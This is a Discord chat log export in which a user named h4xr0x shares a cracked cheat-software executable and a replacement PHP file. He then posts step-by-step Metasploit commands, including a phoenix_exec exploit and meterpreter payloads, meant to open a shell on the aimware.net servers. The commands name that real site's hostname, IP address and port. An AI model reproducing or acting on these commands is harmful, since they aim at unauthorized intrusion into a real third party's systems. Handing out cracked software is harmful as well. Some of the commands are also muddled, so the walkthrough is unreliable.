        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">21-May-20 07:02 AM</span>

            <div class="chatlog__message " data-message-id="712998796187009055" id="message-712998796187009055">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/712998796002590730/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/712998796002590730/unknown.png" alt="Image attachment" title="Image: unknown.png (46.77 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">21-May-20 07:39 AM</span>

            <div class="chatlog__message " data-message-id="713008009055305790" id="message-713008009055305790">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/713008008770355230/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/713008008770355230/unknown.png" alt="Image attachment" title="Image: unknown.png (4.24 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="713008478880399448" id="message-713008478880399448">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/713008478997839892/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/713008478997839892/unknown.png" alt="Image attachment" title="Image: unknown.png (81.96 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


                    <div class="chatlog__reactions">
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="fuzionnani" title="fuzionnani" src="https://cdn.discordapp.com/emojis/709386689017151498.png">
                                <span class="chatlog__reaction-count">17</span>
                            </div>
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="PepeYikes" title="PepeYikes" src="https://cdn.discordapp.com/emojis/712708439016734831.png">
                                <span class="chatlog__reaction-count">11</span>
                            </div>
                    </div>
            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">26-Dec-20 02:58 AM</span>

            <div class="chatlog__message " data-message-id="792315348744536066" id="message-792315348744536066">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/792315348476624916/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/792315348476624916/unknown.png" alt="Image attachment" title="Image: unknown.png (74.3 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


                    <div class="chatlog__reactions">
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="&#128077;" title="&#128077;" src="https://twemoji.maxcdn.com/2/72x72/1f44d.png">
                                <span class="chatlog__reaction-count">5</span>
                            </div>
                    </div>
            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">26-Dec-20 06:15 PM</span>

            <div class="chatlog__message " data-message-id="792546086803603488" id="message-792546086803603488">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace">5.254.113.91</span>

                        </div>
                    </div>



            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">28-Dec-20 03:47 AM</span>

            <div class="chatlog__message " data-message-id="793052553494396939" id="message-793052553494396939">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/793052553356115968/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/793052553356115968/unknown.png" alt="Image attachment" title="Image: unknown.png (57.5 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="793053709277069353" id="message-793053709277069353">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/793053709248364584/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/793053709248364584/unknown.png" alt="Image attachment" title="Image: unknown.png (139.58 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="793055420729786368" id="message-793055420729786368">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/793055420557688832/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/793055420557688832/unknown.png" alt="Image attachment" title="Image: unknown.png (49.6 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="793055819116969994" id="message-793055819116969994">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/793055818899128323/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/793055818899128323/unknown.png" alt="Image attachment" title="Image: unknown.png (74.96 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


                    <div class="chatlog__reactions">
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="sadman" title="sadman" src="https://cdn.discordapp.com/emojis/754841317963727008.gif">
                                <span class="chatlog__reaction-count">3</span>
                            </div>
                    </div>
            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">28-Dec-20 04:39 AM</span>

            <div class="chatlog__message " data-message-id="793065660267626506" id="message-793065660267626506">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/793065660082290688/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/793065660082290688/unknown.png" alt="Image attachment" title="Image: unknown.png (84.56 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">28-Dec-20 04:00 PM</span>

            <div class="chatlog__message " data-message-id="793236884598947890" id="message-793236884598947890">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/793236884263534653/aimware_commandshell.gif">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/793236884263534653/aimware_commandshell.gif" alt="Image attachment" title="Image: aimware_commandshell.gif (1.65 MB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">29-Dec-20 01:22 PM</span>

            <div class="chatlog__message " data-message-id="793559684342611978" id="message-793559684342611978">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace">everyone asks for this; but its out of date; its not connected to; you can use it locally; but youd have to build from source. ok you just want my aimwareV5_cracked.exe anyway? here you go</span>

                        </div>
                    </div>



                    <div class="chatlog__reactions">
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="NO" title="NO" src="https://cdn.discordapp.com/emojis/598628467843661835.png">
                                <span class="chatlog__reaction-count">12</span>
                            </div>
                    </div>
            </div>
            <div class="chatlog__message " data-message-id="793559718102433812" id="message-793559718102433812">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <div class="chatlog__attachment-container">
                                        <svg class="chatlog__attachment-icon" viewBox="0 0 720 960">
                                            <path class="a"/>
                                            <path class="b"/>
                                            <path class="c"/>
                                            <path class="d"/>
                                        </svg>
                                        <div class="chatlog__attachment-filename">
                                            <a href="https://cdn.discordapp.com/attachments/712543386250248265/793559717741068308/AIMWAREv5_Cracked.exe">
                                                AIMWAREv5_Cracked.exe
                                            </a>
                                        </div>
                                        <div class="chatlog__attachment-filesize">
                                            1.53 MB
                                        </div>
                                    </div>
                            </div>
                        </div>
                    </div>


                    <div class="chatlog__reactions">
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="&#128555;" title="&#128555;" src="https://twemoji.maxcdn.com/2/72x72/1f62b.png">
                                <span class="chatlog__reaction-count">18</span>
                            </div>
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="7529_KEKW" title="7529_KEKW" src="https://cdn.discordapp.com/emojis/712708436894285884.png">
                                <span class="chatlog__reaction-count">19</span>
                            </div>
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="&#128169;" title="&#128169;" src="https://twemoji.maxcdn.com/2/72x72/1f4a9.png">
                                <span class="chatlog__reaction-count">8</span>
                            </div>
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="&#127479;" title="&#127479;" src="https://twemoji.maxcdn.com/2/72x72/1f1f7.png">
                                <span class="chatlog__reaction-count">13</span>
                            </div>
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="&#127344;️" title="&#127344;️" src="https://twemoji.maxcdn.com/2/72x72/1f170.png">
                                <span class="chatlog__reaction-count">14</span>
                            </div>
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="&#127481;" title="&#127481;" src="https://twemoji.maxcdn.com/2/72x72/1f1f9.png">
                                <span class="chatlog__reaction-count">13</span>
                            </div>
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="&#127465;" title="&#127465;" src="https://twemoji.maxcdn.com/2/72x72/1f1e9.png">
                                <span class="chatlog__reaction-count">6</span>
                            </div>
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="&#127473;" title="&#127473;" src="https://twemoji.maxcdn.com/2/72x72/1f1f1.png">
                                <span class="chatlog__reaction-count">6</span>
                            </div>
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="&#127470;" title="&#127470;" src="https://twemoji.maxcdn.com/2/72x72/1f1ee.png">
                                <span class="chatlog__reaction-count">6</span>
                            </div>
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="❓" title="❓" src="https://twemoji.maxcdn.com/2/72x72/2753.png">
                                <span class="chatlog__reaction-count">6</span>
                            </div>
                    </div>
            </div>
            <div class="chatlog__message " data-message-id="793559892706590771" id="message-793559892706590771">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/793559892681818142/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/793559892681818142/unknown.png" alt="Image attachment" title="Image: unknown.png (111.92 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">09-Feb-21 06:08 AM</span>

            <div class="chatlog__message " data-message-id="808670539249745940" id="message-808670539249745940">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/808670539081449472/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/808670539081449472/unknown.png" alt="Image attachment" title="Image: unknown.png (100.25 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="808670650465648660" id="message-808670650465648660">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/808670650239418398/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/808670650239418398/unknown.png" alt="Image attachment" title="Image: unknown.png (107.31 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="808670923511037952" id="message-808670923511037952">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/808670923279302707/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/808670923279302707/unknown.png" alt="Image attachment" title="Image: unknown.png (71.02 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="808671105149698048" id="message-808671105149698048">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/808671104960167936/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/808671104960167936/unknown.png" alt="Image attachment" title="Image: unknown.png (100.05 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="808671217909366784" id="message-808671217909366784">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/808671217707253760/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/808671217707253760/unknown.png" alt="Image attachment" title="Image: unknown.png (89.98 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="808671439741648946" id="message-808671439741648946">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/808671439535210496/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/808671439535210496/unknown.png" alt="Image attachment" title="Image: unknown.png (78.95 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">09-Feb-21 07:48 PM</span>

            <div class="chatlog__message " data-message-id="808877025401634837" id="message-808877025401634837">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/808877025578057728/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/808877025578057728/unknown.png" alt="Image attachment" title="Image: unknown.png (111.45 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="808877075985072158" id="message-808877075985072158">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/808877075749404692/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/808877075749404692/unknown.png" alt="Image attachment" title="Image: unknown.png (101.65 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">14-Feb-21 11:57 PM</span>

            <div class="chatlog__message " data-message-id="810751517651894302" id="message-810751517651894302">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace">replace geoip.php in metasploits  in <em>phoenix/includes/</em></span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810751539844481056" id="message-810751539844481056">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <div class="chatlog__attachment-container">
                                        <svg class="chatlog__attachment-icon" viewBox="0 0 720 960">
                                            <path class="a"/>
                                            <path class="b"/>
                                            <path class="c"/>
                                            <path class="d"/>
                                        </svg>
                                        <div class="chatlog__attachment-filename">
                                            <a href="https://cdn.discordapp.com/attachments/712543386250248265/810751539777896468/geoip.php">
                                                geoip.php
                                            </a>
                                        </div>
                                        <div class="chatlog__attachment-filesize">
                                            23.64 KB
                                        </div>
                                    </div>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="810751747739353098" id="message-810751747739353098">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>start metasploits</strong> msfconsole   <em>below instructions to get command shell/ meterpreter session on</em> <strong>aimware.net</strong></span>

                                <span class="chatlog__edited-timestamp" title="15-Feb-21 12:42 AM">(edited)</span>
                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810752058302005258" id="message-810752058302005258">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> use exploit/multi/http/phoenix_exec/</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810752178989826079" id="message-810752178989826079">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> show payloads</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810752657987731496" id="message-810752657987731496">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> set PAYLOAD 8</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810752754527240192" id="message-810752754527240192">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> show options</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810752799058034710" id="message-810752799058034710">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong>show advanced options</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810752925151920129" id="message-810752925151920129">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong>  set VHOST lh29087.voxility.net</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810753059244212305" id="message-810753059244212305">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> set SSL false</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810753683100008458" id="message-810753683100008458">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong>  set RHOST aimware.net ( you can also do this from cloudflare ip active on aimware.net, their voxility hostname: lh29087.voxility.net or  their voxility ip:  <strong>5.254.113.91</strong> range 89-95 )                                         
<strong>type</strong> set RPORT 8443     <strong>type</strong> set LPORT 8080                                                                                                                                              <strong>type</strong> set LHOST ( local host address or 127.0.0.1 ) <strong>type</strong> set LPORT 8080</span>

                                <span class="chatlog__edited-timestamp" title="15-Feb-21 01:02 AM">(edited)</span>
                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810753843888390174" id="message-810753843888390174">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> set Id 0</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810754304084017212" id="message-810754304084017212">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> exploit -J</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810754467245850625" id="message-810754467245850625">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> sessions</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810754814194876426" id="message-810754814194876426">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> use /multi/handler/</span>

                                <span class="chatlog__edited-timestamp" title="15-Feb-21 01:19 AM">(edited)</span>
                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810755064125325322" id="message-810755064125325322">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> show advanced options</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810755167900401734" id="message-810755167900401734">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> set ReverseAllowProxy true</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810755257227411496" id="message-810755257227411496">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> set ARCH MySQL</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810755399019528192" id="message-810755399019528192">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> set ReverseListenerBindPort 3306</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810755595514544138" id="message-810755595514544138">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> set PAYLOAD php/meterpreter/bind_tcp_ipv6_uuid</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810757281465106452" id="message-810757281465106452">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> set HandlerSSLCert <a href="https://crt.sh/?d=2722970727">https://crt.sh/?d=2722970727</a></span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810757484302172221" id="message-810757484302172221">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> set PingbackRetries 3</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810757565662625822" id="message-810757565662625822">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> set VERBOSE true</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810757651922288660" id="message-810757651922288660">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> set PayloadUUIDTracking true</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810757765400231946" id="message-810757765400231946">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> set AutoRunScript true</span>

                        </div>
                    </div>



            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">15-Feb-21 12:33 AM</span>

            <div class="chatlog__message " data-message-id="810760625796939867" id="message-810760625796939867">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> set session 3 ( view sessions, use any session # to make active session )</span>

                                <span class="chatlog__edited-timestamp" title="15-Feb-21 12:34 AM">(edited)</span>
                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810761001531736124" id="message-810761001531736124">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> info</span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810761792267354112" id="message-810761792267354112">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> set RHOST aimware.net     ( <strong>you can also use voxility ip or host address:</strong> 5.254.113.91    <strong>or</strong>    lh29087.voxility.net</span>

                                <span class="chatlog__edited-timestamp" title="15-Feb-21 12:44 AM">(edited)</span>
                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="810762505727115295" id="message-810762505727115295">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>type</strong> exploit -J</span>

                        </div>
                    </div>



            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">15-Feb-21 03:54 PM</span>

            <div class="chatlog__message " data-message-id="810992539099201568" id="message-810992539099201568">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/810992539053850674/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/810992539053850674/unknown.png" alt="Image attachment" title="Image: unknown.png (136.21 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="810993740914491422" id="message-810993740914491422">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/810993740730466304/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/810993740730466304/unknown.png" alt="Image attachment" title="Image: unknown.png (104.74 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">15-Feb-21 04:07 PM</span>

            <div class="chatlog__message " data-message-id="810995854822473758" id="message-810995854822473758">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/810995854621278228/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/810995854621278228/unknown.png" alt="Image attachment" title="Image: unknown.png (77.39 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
